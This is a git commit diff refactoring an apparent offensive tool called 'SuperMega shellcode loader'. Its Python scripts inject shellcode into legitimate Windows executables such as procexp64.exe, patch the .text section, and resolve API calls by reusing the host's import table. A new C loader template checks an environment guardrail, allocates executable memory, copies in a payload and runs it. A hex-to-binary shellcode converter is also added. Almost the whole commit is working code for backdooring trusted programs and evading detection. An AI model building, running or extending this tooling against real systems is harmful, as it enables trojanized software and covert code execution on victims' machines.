refactor: introduced and use ExeCapabilities, make it more generic

This commit is contained in:
Dobin
2024-02-09 17:44:31 +00:00
parent d7c8e1525f
commit dfd13435a0
10 changed files with 291 additions and 90 deletions
+1 -1
View File
@@ -60,7 +60,7 @@ def write_code_section(pe_file, new_data):
with open(pe_file, 'r+b') as f:
f.seek(file_offset)
f.write(new_data)
print("Successfully overwritten the .text section with new data.")
#print("Successfully overwritten the .text section with new data.")
break
+76
View File
@@ -0,0 +1,76 @@
from typing import Dict
import pehelper
import pefile
class Capability():
def __init__(self, name):
self.name = name
self.id: bytes = b""
self.addr: int = 0
def __str__(self):
return "0x{:X}: {} ({})".format(
self.addr,
self.name,
self.id
)
class ExeCapabilities():
def __init__(self, capabilities):
self.capabilities: Dict[str, Capability] = {}
self.image_base = 0
self.text_virtaddr = 0
for cap in capabilities:
self.capabilities[cap] = Capability(cap)
def parse_from_exe(self, filepath):
pe = pefile.PE(filepath)
# image base
self.image_base = pe.OPTIONAL_HEADER.ImageBase
# .text virtual address
for section in pe.sections:
if section.Name.decode().rstrip('\x00') == '.text':
self.text_virtaddr = section.VirtualAddress
# iat
iat = pehelper.extract_iat(pe)
for _, cap in self.capabilities.items():
cap.addr = pehelper.get_addr_for(iat, cap.name)
def get(self, func_name):
if not func_name in self.capabilities:
return None
if self.capabilities[func_name].addr == 0:
return None
return self.capabilities[func_name]
def get_all(self) -> Dict[str, Capability]:
return self.capabilities
def has_all(self):
needs = [ 'GetEnvironmentVariableW', 'VirtualAlloc']
for need in needs:
if not need in self.capabilities:
return False
if self.capabilities[need].addr == 0:
return False
return True
def print(self):
print("--( Capabilities: ")
for _, cap in self.capabilities.items():
print(" " + str(cap))
+14 -18
View File
@@ -6,9 +6,9 @@ from capstone import Cs, CS_ARCH_X86, CS_MODE_64
def assemble_and_disassemble_jump(current_address, destination_address):
print("Make jmp from 0x{:X} to 0x{:X}".format(
current_address, destination_address
))
#print(" Make jmp from 0x{:X} to 0x{:X}".format(
# current_address, destination_address
#))
# Calculate the relative offset
# For a near jump, the instruction length is typically 5 bytes (E9 xx xx xx xx)
offset = destination_address - current_address
@@ -19,14 +19,15 @@ def assemble_and_disassemble_jump(current_address, destination_address):
machine_code = bytes(encoding)
# Disassemble the machine code using Capstone
cs = Cs(CS_ARCH_X86, CS_MODE_64)
disassembled = next(cs.disasm(machine_code, current_address))
print(f"Machine Code: {' '.join(f'{byte:02x}' for byte in machine_code)}")
print(f"Disassembled: {disassembled.mnemonic} {disassembled.op_str}")
#cs = Cs(CS_ARCH_X86, CS_MODE_64)
#disassembled = next(cs.disasm(machine_code, current_address))
#print(f"Machine Code: {' '.join(f'{byte:02x}' for byte in machine_code)}")
#print(f"Disassembled: {disassembled.mnemonic} {disassembled.op_str}")
return machine_code
# IAT Stuff
def extract_iat(pe):
iat = {}
@@ -37,6 +38,8 @@ def extract_iat(pe):
for entry in pe.DIRECTORY_ENTRY_IMPORT:
for imp in entry.imports:
dll_name = entry.dll.decode('utf-8')
if imp.name == None:
continue
imp_name = imp.name.decode('utf-8')
imp_addr = imp.address
#pprint.pprint(imp.keys())
@@ -65,21 +68,14 @@ def get_addr_for(iat, func_name):
for entry in iat[dll_name]:
if entry["func_name"] == func_name:
return entry["func_addr"]
return None
return 0
def resolve_iat_capabilities(needed_capabilities, inject_exe):
pe = pefile.PE(inject_exe)
iat = extract_iat(pe)
print("IAT: ")
for cap in needed_capabilities:
needed_capabilities[cap] = {
"id": None,
"addr": get_addr_for(iat, cap),
}
#print(" {}: {}".format(cap, needed_capabilities[cap]))
for _, cap in needed_capabilities.items():
cap.addr = get_addr_for(iat, cap.name)
def main():
+11 -8
View File
@@ -3,8 +3,10 @@ from config import config
import os
import pprint
from model import *
def make_c_to_asm(c_file, asm_file, payload_len, exe_capabilities):
def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
print("--[ C to ASM: {} -> {} ]".format(c_file, asm_file))
asm = {
@@ -45,7 +47,7 @@ def make_c_to_asm(c_file, asm_file, payload_len, exe_capabilities):
# Phase 2: Assembly fixup
print("---[ Fixup : {} ]".format(asm_file))
if not fixup_asm_file(asm_file, payload_len, exe_capabilities):
if not fixup_asm_file(asm_file, payload_len, capabilities):
print("Error: Fixup failed")
return
else:
@@ -62,7 +64,7 @@ def bytes_to_asm_db(byte_data):
return "\tDB " + formatted_string
def fixup_asm_file(filename, payload_len, exe_capabilities):
def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
with open(filename, 'r', encoding='utf-8') as asmfile:
lines = asmfile.readlines()
@@ -86,15 +88,16 @@ def fixup_asm_file(filename, payload_len, exe_capabilities):
func_name = lines[idx][lines[idx].find("__imp_")+6:].rstrip()
print(" > Replace func name: {}".format(func_name))
if func_name not in exe_capabilities or exe_capabilities[func_name] == None:
print("Capabilities not: {}".format(func_name))
exeCapability = capabilities.get(func_name)
if exeCapability == None:
#if func_name not in exe_capabilities or exe_capabilities[func_name] == None:
print("Error Capabilities not: {}".format(func_name))
else:
randbytes = os.urandom(6)
randbytes: bytes = os.urandom(6)
lines[idx] = bytes_to_asm_db(randbytes) + "\r\n"
exe_capabilities[func_name]["id"] = randbytes
exeCapability.id = randbytes
#func_addr = exe_capabilities[func_name]
#lines[idx] = "\tcall main\r\n"
#lines[idx] = "\tcall rax\r\n"
#lines.insert(idx, "\tmov rax, [rax]\r\n")
#lines.insert(idx, "\tmov rax, {:X}H\r\n".format(func_addr))
+28 -36
View File
@@ -2,13 +2,18 @@ from helper import *
import shutil
import pprint
from pehelper import *
from model import *
def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities):
def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities: ExeCapabilities):
print("--[ Injecting: {} into: {} -> {} ]".format(
shc_file, exe_in, exe_out
))
# create copy of file exe_in to exe_out
shutil.copyfile(exe_in, exe_out)
# inject shellcode into exe_out with redbackdoorer
# python3.exe .\redbackdoorer.py 1,1 main-clean-append.bin .\exes\procexp64-a.exe
subprocess.run([
"python3.exe",
@@ -16,52 +21,39 @@ def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities):
mode,
shc_file,
exe_out
], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# get code section
# get offset from start of code
# get offset of code setion?
####
print("-------------")
#pprint.pprint(exe_capabilities)
for cap in exe_capabilities:
print("-> 0x{:X}\t\t{}".format(
exe_capabilities[cap]["addr"],
cap,
#exe_capabilities["id"],
))
print("-------------")
# get code section of exe_out
code = get_code_section(exe_out)
# replace IAT in shellcode
for cap in exe_capabilities:
#print("AAAA: " + str(cap))
if not exe_capabilities[cap]["id"] in code:
# replace IAT in shellcode in code
# and re-implant it
for cap in exe_capabilities.get_all().values():
if not cap.id in code:
print("Not found, abort")
raise Exception()
off = code.index(exe_capabilities[cap]["id"])
current_address = off + 0x140000000 + 4096
print(" Off: 0x{:X}".format(off))
print(" Off2: 0x{:X}".format(current_address)) # base addr
#print(" Diff: 0x{:X}".format())
destination_address = exe_capabilities[cap]["addr"]
off = code.index(cap.id)
current_address = off + exe_capabilities.image_base + exe_capabilities.text_virtaddr
destination_address = cap.addr
print(" Replace at 0x{:x} with call to 0x{:x}".format(
current_address, destination_address
))
jmp = assemble_and_disassemble_jump(
current_address, destination_address
)
print("ONE: {}".format(jmp))
print("TWO: {}".format(exe_capabilities[cap]["id"]))
print("Found! replacing")
code = code.replace(
exe_capabilities[cap]["id"], jmp)
code = code.replace(cap.id, jmp)
write_code_section(exe_out, code)
#print(" Off: 0x{:X}".format(off))
#print(" Off2: 0x{:X}".format(current_address)) # base addr
#print(" Diff: 0x{:X}".format())
#print("ONE: {}".format(jmp))
#print("TWO: {}".format(cap.id))
#print("Found! replacing")
def verify_injected_exe(exefile):
print("---[ Verify infected exe: {} ]".format(exefile))
+24
View File
@@ -0,0 +1,24 @@
# Your input string of escaped hex bytes
#escaped_hex_bytes = "\\x31\\xc0\\x31\\xc9\\x64\\x8b\\x71\\x30\\x8b\\x76\\x0c\\x8b\\x76\\x1c\\x8b\\x56\\x08\\x8b\\x7e\\x20"
import sys
infile = sys.argv[1]
output_file_name = sys.argv[2]
with open(infile, "r") as f:
escaped_hex_bytes = f.read()
escaped_hex_bytes = escaped_hex_bytes.replace('\n', '')
escaped_hex_bytes = escaped_hex_bytes.replace('\\x', '')
print(escaped_hex_bytes)
# Convert the string with escaped hex bytes to actual binary data
binary_data = bytes.fromhex(escaped_hex_bytes)
# Write the binary data to a file
with open(output_file_name, "wb") as binary_file:
binary_file.write(binary_data)
print(f"Binary file created: {output_file_name}")
+43
View File
@@ -0,0 +1,43 @@
#include <Windows.h>
char *dobin;
int main()
{
// Execution Guardrail: Env Check
wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0};
wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker"
WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
DWORD result = ((DWORD(WINAPI*)(LPCWSTR, LPWSTR, DWORD))GetEnvironmentVariableW)(envVarName, buffer, 1024);
if (result == 0) {
return 6;
}
if (mystrcmp(buffer, tocheck) != 0) {
return 6;
}
// Copy shellcode
// ntdll.dll: VirtualAlloc()
char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
// 11223344 is a magic number which will be replaced in the asm source
// with the payload length.
for(int n=0; n<11223344; n++) {
dest[n] = dobin[n];
}
// Exec shellcode
(*(void(*)())(dest))();
return 0;
}
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
+94 -27
View File
@@ -2,7 +2,9 @@ import shutil
from enum import Enum
from helper import *
import argparse
from typing import Dict
from model import *
from config import config
from pehelper import *
from phases.ctoasm import *
@@ -26,11 +28,21 @@ class CopyStyle(Enum):
class DataRefStyle(Enum):
APPEND = 1
#class InjectStyle(Enum):
class SourceStyle(Enum):
peb_walk = 1
iat_reuse = 2
options_default = {
"payload": "shellcodes/calc64.bin",
"verify": False,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
@@ -61,15 +73,16 @@ options_default = {
}
# VERIFY
# VERIFY: STD
# This will verify if our loader works
# - Use it on a "target" machine
# - payload shellcode will create a file c:\temp\a
# - set: verify=True
options_verify = {
options_verify_std = {
"payload": "shellcodes/createfile.bin",
"verify": True,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
@@ -77,25 +90,64 @@ options_verify = {
"dataref_style": DataRefStyle.APPEND,
# testing
"try_start_loader_shellcode": False, # without payload (Debugging)
"try_start_final_shellcode": False, # with payload (should work)
"try_start_final_infected_exe": False, # with payload (should work)
"try_start_loader_shellcode": False,
"try_start_final_shellcode": False,
"try_start_final_infected_exe": False,
# injecting into exe
"inject_exe": True,
"inject_mode": "1,1",
#"inject_exe_in": "exes/procexp64.exe",
"inject_exe_in": "exes/iattest-full.exe",
#"inject_exe_out": "out/procexp64-a.exe",
"inject_exe_out": "out/iatttest-full-a.exe",
"inject_exe_in": "exes/procexp64.exe",
"inject_exe_out": "out/procexp64-a.exe",
# For debugging: Can disable some steps
"generate_asm_from_c": True, # phase 2
"generate_shc_from_asm": True, # phase 3
# cleanup
"cleanup_files_on_start": False,
"cleanup_files_on_exit": False, # all is just in out/
"cleanup_files_on_start": True,
"cleanup_files_on_exit": True, # all is just in out/
# doesnt work
"obfuscate_shc_loader": False,
"test_obfuscated_shc": False,
}
# VERIFY: IAT
# This will verify if our loader works
# - payload shellcode will create a file c:\temp\a
options_verify_iat = {
"payload": "shellcodes/createfile.bin",
"verify": True,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
"copy_style": CopyStyle.SIMPLE,
"dataref_style": DataRefStyle.APPEND,
# testing
"try_start_loader_shellcode": False,
"try_start_final_shellcode": False,
"try_start_final_infected_exe": False,
# injecting into exe
"inject_exe": True,
"inject_mode": "1,1",
"inject_exe_in": "exes/iattest-full.exe", # important
"inject_exe_out": "out/iatttest-full-a.exe",
# For debugging: Can disable some steps
"generate_asm_from_c": True,
"generate_shc_from_asm": True,
# cleanup
"cleanup_files_on_start": True,
"cleanup_files_on_exit": True, # all is just in out/
# doesnt work
"obfuscate_shc_loader": False,
@@ -130,11 +182,16 @@ def main():
parser = argparse.ArgumentParser(description='SuperMega shellcode loader')
parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode')
parser.add_argument('--inject', type=str, help='The path to the file where we will inject ourselves in')
parser.add_argument('--verify', action='store_true', help='Debug: Perform verification')
parser.add_argument('--verify', type=str, help='Debug: Perform verification: std/iat')
args = parser.parse_args()
if args.verify:
options = options_verify
if args.verify == "std":
options = options_verify_std
elif args.verify == "iat":
options = options_verify_iat
else:
print("Unknown verify option {}, use std/iat".format(args.verify))
else:
options = options_default
if args.shellcode:
@@ -157,17 +214,27 @@ def start(options):
if options["cleanup_files_on_start"]:
clean_files()
# Copy: loader C files into working directory: build/
shutil.copy("source/main.c", "build/main.c")
shutil.copy("source/peb_lookup.h", "build/peb_lookup.h")
# Check: Destination EXE capabilities
exe_capabilities = {
#"MessageBoxW": None,
"GetEnvironmentVariableW": None,
"VirtualAlloc": None,
}
resolve_iat_capabilities(exe_capabilities, options["inject_exe_in"])
capabilities = ExeCapabilities([
"GetEnvironmentVariableW",
"VirtualAlloc"
])
capabilities.parse_from_exe(options["inject_exe_in"])
capabilities.print()
if capabilities.has_all():
options["source_style"] = SourceStyle.iat_reuse
else:
options["source_style"] = SourceStyle.peb_walk
print("--[ SourceStyle: {}".format(options["source_style"].name))
# Copy: loader C files into working directory: build/
if options["source_style"] == SourceStyle.peb_walk:
shutil.copy("source/peb_walk/main.c", "build/main.c")
shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
elif options["source_style"] == SourceStyle.iat_reuse:
shutil.copy("source/iat_reuse/main.c", "build/main.c")
# Convert: C -> ASM
if options["generate_asm_from_c"]:
@@ -176,7 +243,7 @@ def start(options):
data_payload = input2.read()
payload_length = len(data_payload)
debug_data["payload_shellcode"] = data_payload
asm = make_c_to_asm(main_c_file, main_asm_file, payload_length, exe_capabilities)
asm = make_c_to_asm(main_c_file, main_asm_file, payload_length, capabilities)
debug_data["asm_initial"] = asm["initial"]
debug_data["asm_cleanup"] = asm["cleanup"]
debug_data["asm_fixup"] = asm["fixup"]
@@ -235,7 +302,7 @@ def start(options):
options["inject_exe_in"],
options["inject_exe_out"],
options["inject_mode"],
exe_capabilities)
capabilities)
if options["verify"]:
print("--[ Verify final exe ]")
if verify_injected_exe(options["inject_exe_out"]):